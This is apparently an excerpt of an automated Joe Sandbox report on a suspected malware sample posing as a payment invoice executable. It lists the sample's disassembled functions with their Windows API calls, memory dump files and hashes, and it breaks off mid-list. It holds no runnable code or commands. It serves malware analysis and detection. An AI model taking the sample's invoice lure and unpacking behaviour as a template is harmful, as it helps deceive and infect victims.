                                                                                                                                                                                                                      Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405EB9 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                      • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13D01272504420AFC2502738EF0C89FBF95DB543717124B35FAE9A22F0CB304C568A98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1375471231-0
                                                                                                                                                                                                                      • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                                      • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D2A74 Relevance: 2.7, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 6F1D2B33
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6F1D2C3A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocErrorLastVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 497505419-0
                                                                                                                                                                                                                      • Opcode ID: 6562d4b4eb3f9fb734115e2431266edb350bb534ba077ffc85fb41037256f6a9
                                                                                                                                                                                                                      • Instruction ID: d542b9609b24ab2bad97fb26259103353280119900d2d952a924316245bdcfb6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6562d4b4eb3f9fb734115e2431266edb350bb534ba077ffc85fb41037256f6a9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55518F725067849FDB28DFA4D980B993775FB463E8F21442AF824CB680C739B4B1CB91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                                                                                                                        • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointerwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 327478801-0
                                                                                                                                                                                                                      • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                                                      • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                      • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                      • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0041043A,0040CED0,004033DE,0040CED0,0041043A,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                      • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(6F1D405C,00000004,00000040,6F1D404C), ref: 6F1D29B5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                      • Opcode ID: 2ffe1ab299e10fd6536eeb1f3ab410133ac1a55e600d7c338b7d90a8a3289e66
                                                                                                                                                                                                                      • Instruction ID: e72f658cd08105f0a731a8e8f6b7a576370fcdba5a05f8b4753491c218418a1d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ffe1ab299e10fd6536eeb1f3ab410133ac1a55e600d7c338b7d90a8a3289e66
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F0AEB190AA80DECB50CF6888447863BF0F75A3E4B12852AE2ACD6240E3366068CF51
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                      • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
